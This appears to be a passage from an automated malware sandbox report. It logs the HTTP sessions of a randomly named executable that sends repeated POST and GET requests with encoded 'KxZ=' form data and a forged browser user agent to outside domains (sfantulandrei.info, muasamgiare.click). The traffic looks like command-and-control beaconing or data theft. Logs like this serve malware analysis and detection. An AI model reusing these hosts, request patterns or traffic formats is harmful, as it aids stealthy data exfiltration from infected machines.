                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/dc08/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 45 31 75 32 71 45 64 4d 37 32 58 62 39 64 78 4a 62 35 41 71 6a 7a 75 7a 2f 46 77 32 73 31 61 35 2b 46 37 48 30 43 71 73 6e 4e 33 59 50 78 2f 74 53 69 6f 36 79 68 6a 54 39 59 54 59 52 6c 2b 6b 4f 79 61 49 2f 41 42 59 74 62 64 72 44 78 76 76 45 6b 39 67 51 62 59 47 7a 53 64 70 67 4c 46 6a 76 63 6c 58 58 57 2f 45 39 56 58 57 75 33 76 4d 56 56 6a 46 63 6b 7a 7a 62 73 41 53 36 48 58 46 58 72 5a 65 42 76 69 33 37 73 4b 39 52 4d 30 70 69 4d 43 6b 68 6d 36 62 4f 31 76 53 6a 47 61 35 4d 56 64 4f 6e 63 66 51 44 7a 2f 6f 57 77 56 57 63 72 64 44 4d 7a 6e 6d 69 32 6f 4e 33 56 67 58 41 49 35 52 50 45 56 53 5a 68 30 78 58 6e 4c 75 51 6a 39 42 6e 69 64 30 71 70 47 59 39 64 37 57 33 51 37 30 61 64 58 2f 44 7a 35 2f 4b 64 2f 4b 6d 6b 6f 31 36 76 6e 4e 7a 4e 4a 70 69 65 2f 6a 76 34 45 2b 4b 4d 75 50 6c 33 45 48 73 57 65 57 34 54 57 38 2b 53 62 63 32 63 4d 39 78 45 44 30 6d 55 71 2b [TRUNCATED]
                                                                    Data Ascii: KxZ=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqE1u2qEdM72Xb9dxJb5Aqjzuz/Fw2s1a5+F7H0CqsnN3YPx/tSio6yhjT9YTYRl+kOyaI/ABYtbdrDxvvEk9gQbYGzSdpgLFjvclXXW/E9VXWu3vMVVjFckzzbsAS6HXFXrZeBvi37sK9RM0piMCkhm6bO1vSjGa5MVdOncfQDz/oWwVWcrdDMznmi2oN3VgXAI5RPEVSZh0xXnLuQj9Bnid0qpGY9d7W3Q70adX/Dz5/Kd/Kmko16vnNzNJpie/jv4E+KMuPl3EHsWeW4TW8+Sbc2cM9xED0mUq+BMD/aAbXwy+369ks7YlQwoRowfCN2nocM9bAMBlz+AVhoKnQnrCS8kEXrq1nmEvrDdlfyRZAdzk/IirXLk2GaIhPyoThSw8J98fElnqCAEtIqa538LmoDXtM6rQ5rxKvQkybU/4ri4BunhN7r49e+tUVYWe6znbR9ZgE5w5cKg3YmP1T+Hxoj1jOwRS2pb804ZykiBiwdOOLmYgLbzQfqnIsWQMdtLXGskL2c/+7Pi46F8FahZsBtH9Dx0YLpILNEfe793jc5nb4oVBvUzFvDXMPSfO6gKdSOv/sUjeWGCEYlsTPjlml7cTiq32WR9X7zjMCvvL1TUKzsFK7bYL06TIPKni2Jmx7eju2iGOnFbFaYKqmbm3Fsl2sQrH6geeJcLGSH0M/RMU6RRut+d7tHHfeNVROLVtGVxRhcP78+VLXURk0qFSmpRZY//BxEA0IJ35a2FwtHxAPUkJakk5+D4rTdSPVxRzNfpJJDPe+EVsHaqBLCndxvL8PdyJmSJFrkEV63qRpavv2k5OCscA7yioKyxQg6GJcOJu/Sc8TJmIsywZ1PavY65CO0rNTksKsBMXPKQhxY2n/WJS5t10Wa/jYDnuZDjdo1OXo+tMW9mi3hHXhKlWAlBgzzJbQN1evkuG60BoYrCjn8P2yXzLtccgWNkh/ifjqPE [TRUNCATED]
                                                                    Dec 6, 2024 10:06:56.129877090 CET368INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:55 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.65003013.228.81.39805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:57.199027061 CET597OUTGET /dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:58.786322117 CET519INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:58 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.650032199.59.243.227805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:04.688956022 CET872OUTPOST /wvsm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sfantulandrei.info
                                                                    Referer: http://www.sfantulandrei.info/wvsm/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 4c 52 68 57 74 50 71 4b 46 37 64 4c 4b 39 4c 4f 6f 41 75 36 47 64 59 74 70 37 31 68 4b 2b 70 70 68 56 78 44 75 35 67 4d 46 6d 73 41 69 44 63 43 41 7a 50 72 4f 72 79 74 31 6e 46 76 58 38 76 32 35 38 37 51 70 67 2b 65 72 67 69 2b 6e 43 31 68 33 46 75 31 4c 77 61 48 77 39 59 45 59 64 72 6e 52 6b 6c 78 64 6c 48 6d 50 58 6c 77 71 5a 76 53 62 7a 74 68 47 33 49 59 34 73 50 69 2f 53 49 79 6f 77 75 2b 74 75 6c 75 6b 7a 5a 51 44 6c 52 2f 76 59 74 76 56 68 73 76 6c 59 48 57 70 73 78 32 77 4f 41 2f 4a 54 77 56 45 65 64 42 31 41 50 44 30 72 6c 47 33 36 54 5a 37 6d 4a 72 47 48 67 42
                                                                    Data Ascii: KxZ=K3B/WoIvcrplLRhWtPqKF7dLK9LOoAu6GdYtp71hK+pphVxDu5gMFmsAiDcCAzPrOryt1nFvX8v2587Qpg+ergi+nC1h3Fu1LwaHw9YEYdrnRklxdlHmPXlwqZvSbzthG3IY4sPi/SIyowu+tulukzZQDlR/vYtvVhsvlYHWpsx2wOA/JTwVEedB1APD0rlG36TZ7mJrGHgB
                                                                    Dec 6, 2024 10:07:05.771228075 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:05 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: a0443c0e-f3bd-4f7a-8db1-f7467016e7af
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==
                                                                    set-cookie: parking_session=a0443c0e-f3bd-4f7a-8db1-f7467016e7af; expires=Fri, 06 Dec 2024 09:22:05 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 58 44 61 64 47 2b 47 43 41 6b 33 2b 6d 6b 68 4d 38 76 50 58 43 42 48 54 63 4d 54 4b 71 49 74 5a 2f 56 61 63 35 64 7a 6a 70 64 6f 5a 4e 59 33 2f 4c 50 75 72 41 36 55 4c 4c 64 34 6a 4b 7a 4c 47 6c 59 7a 2f 71 56 66 57 48 50 35 72 32 36 4f 53 35 30 62 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 6, 2024 10:07:05.771253109 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTA0NDNjMGUtZjNiZC00ZjdhLThkYjEtZjc0NjcwMTZlN2FmIiwicGFnZV90aW1lIjoxNzMzNDc2MD


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.650033199.59.243.227805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:07.344991922 CET896OUTPOST /wvsm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sfantulandrei.info
                                                                    Referer: http://www.sfantulandrei.info/wvsm/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4d 39 70 68 77 56 44 76 38 4d 4d 4c 47 73 41 32 54 63 48 66 6a 4f 6c 4f 72 2b 6c 31 6b 64 76 58 39 50 32 35 35 48 51 70 7a 57 64 70 77 69 34 75 69 31 5a 30 31 75 31 4c 77 61 48 77 39 4d 39 59 64 54 6e 51 57 78 78 48 41 7a 6c 52 48 6c 2f 38 4a 76 53 66 7a 74 6c 47 33 49 2b 34 75 36 48 2f 51 77 79 6f 78 65 2b 73 37 46 76 75 7a 5a 57 4d 46 51 49 6a 36 45 31 52 68 31 62 68 61 76 79 6f 66 6c 72 38 59 64 6c 56 67 77 32 57 4f 39 44 31 43 58 78 30 4c 6c 73 31 36 72 5a 70 78 46 4d 4a 7a 46 69 58 6a 4d 51 46 4f 37 47 63 34 68 70 6e 76 48 4b 2b 7a 30 4e 70 51 3d 3d
                                                                    Data Ascii: KxZ=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKM9phwVDv8MMLGsA2TcHfjOlOr+l1kdvX9P255HQpzWdpwi4ui1Z01u1LwaHw9M9YdTnQWxxHAzlRHl/8JvSfztlG3I+4u6H/Qwyoxe+s7FvuzZWMFQIj6E1Rh1bhavyoflr8YdlVgw2WO9D1CXx0Lls16rZpxFMJzFiXjMQFO7Gc4hpnvHK+z0NpQ==
                                                                    Dec 6, 2024 10:07:08.427506924 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:07 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: c8751983-890e-4822-af1c-c9b6b0322368
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==
                                                                    set-cookie: parking_session=c8751983-890e-4822-af1c-c9b6b0322368; expires=Fri, 06 Dec 2024 09:22:08 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 58 44 61 64 47 2b 47 43 41 6b 33 2b 6d 6b 68 4d 38 76 50 58 43 42 48 54 63 4d 54 4b 71 49 74 5a 2f 56 61 63 35 64 7a 6a 70 64 6f 5a 4e 59 33 2f 4c 50 75 72 41 36 55 4c 4c 64 34 6a 4b 7a 4c 47 6c 59 7a 2f 71 56 66 57 48 50 35 72 32 36 4f 53 35 30 62 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 6, 2024 10:07:08.427552938 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg3NTE5ODMtODkwZS00ODIyLWFmMWMtYzliNmIwMzIyMzY4IiwicGFnZV90aW1lIjoxNzMzNDc2MD


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.650034199.59.243.227805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:10.000368118 CET1909OUTPOST /wvsm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sfantulandrei.info
                                                                    Referer: http://www.sfantulandrei.info/wvsm/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4e 46 70 67 44 74 44 75 66 55 4d 49 47 73 41 71 6a 63 47 66 6a 4f 6f 4f 72 6d 62 31 6a 56 2f 58 35 2f 32 35 66 7a 51 39 57 71 64 6a 77 69 34 73 69 31 69 33 46 75 6b 4c 77 4b 39 77 39 63 39 59 64 54 6e 51 57 64 78 52 46 48 6c 54 48 6c 77 71 5a 76 4f 62 7a 73 36 47 7a 63 41 34 75 75 39 2f 68 51 79 76 52 4f 2b 75 49 74 76 73 54 5a 55 50 46 51 51 6a 36 5a 72 52 68 59 69 68 65 76 49 6f 64 35 72 2f 4d 34 50 49 77 34 4f 44 38 35 6b 6a 7a 7a 4e 36 4d 35 46 76 63 37 41 69 7a 31 71 4f 43 6b 4a 58 44 5a 49 49 4d 37 47 61 36 74 2f 35 70 2b 6f 7a 48 70 6c 72 31 70 6c 33 34 67 46 30 4f 6c 4e 54 41 2b 32 6a 6d 50 53 4c 56 79 58 56 4b 44 57 63 59 5a 31 77 56 47 6d 6c 47 61 44 51 61 69 72 62 54 36 37 79 44 50 74 69 4a 48 33 61 49 72 62 4d 48 2f 4d 55 46 36 4e 58 64 56 46 69 35 34 6c 69 70 33 73 44 33 71 48 39 65 62 4c 51 48 4b 34 56 54 66 4a 59 62 61 56 55 32 6d 48 72 5a 57 66 62 79 [TRUNCATED]
                                                                    Data Ascii: KxZ=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKNFpgDtDufUMIGsAqjcGfjOoOrmb1jV/X5/25fzQ9Wqdjwi4si1i3FukLwK9w9c9YdTnQWdxRFHlTHlwqZvObzs6GzcA4uu9/hQyvRO+uItvsTZUPFQQj6ZrRhYihevIod5r/M4PIw4OD85kjzzN6M5Fvc7Aiz1qOCkJXDZIIM7Ga6t/5p+ozHplr1pl34gF0OlNTA+2jmPSLVyXVKDWcYZ1wVGmlGaDQairbT67yDPtiJH3aIrbMH/MUF6NXdVFi54lip3sD3qH9ebLQHK4VTfJYbaVU2mHrZWfby9QvrdYCJYTL8F+Ut/k33nBJ9WzkJoAQPKsstrKk54mQ80XoJmZEMGpwU7giCKGBEEYxQt0CKdWR+y2mvDGVeeK6TeBkA3wnDDdPPBCjgDfFzDrk59IeZpJkoyoHEdxrwYluRmweH8r5cxkMwhINMdDfUCW7eiCgE8Uh6SXjEFkUzYohVIA47MwZbKosY7QLM7fqcqYs/4fTIJRedWeCKvWs+sIe71ATpvxcqK9zyAQZJTCPJRRZHe5FU4yXk056mPIKV1vUNvLXd44K6hD+8m58dRf5g36VXXMqvRPCI1B35V2sIFANKqK6kFsyJy2GbcDjH7AOY//jtFkLwgGw5hGlPa35tYQOrMEDOYpdy3rR6gLFLK//qf7rY2pATJPsIelEbe2ak0jO39nRcBZsBTg1gvATEdAz+aRr6KcWBLs87eSHb6eDIUW3dcBcn0YeXixGexIvU2NQrvHUnnrTuV3kUxa4asOioazreOF71+k4Qj2CUwmpNsreTZe47WNqDIF2xOdbLc0QrsAAucVwF8K95SJynR3A+t0zYvKPejQEyr19FjIQYqEeQnWzDfOLyk9frCpjN88NtKUdZ2EkdkIar5Z9y3UeQl52brn3wVSRBZeYyJebRusAkCkJvJpC1LnPkVFKMh2FpZoNZZMn5Lh13nP05Hslajc [TRUNCATED]
                                                                    Dec 6, 2024 10:07:11.088685989 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:10 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: ba4b4c8d-4319-49b3-99b6-7c3284e57a83
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==
                                                                    set-cookie: parking_session=ba4b4c8d-4319-49b3-99b6-7c3284e57a83; expires=Fri, 06 Dec 2024 09:22:10 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 58 44 61 64 47 2b 47 43 41 6b 33 2b 6d 6b 68 4d 38 76 50 58 43 42 48 54 63 4d 54 4b 71 49 74 5a 2f 56 61 63 35 64 7a 6a 70 64 6f 5a 4e 59 33 2f 4c 50 75 72 41 36 55 4c 4c 64 34 6a 4b 7a 4c 47 6c 59 7a 2f 71 56 66 57 48 50 35 72 32 36 4f 53 35 30 62 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
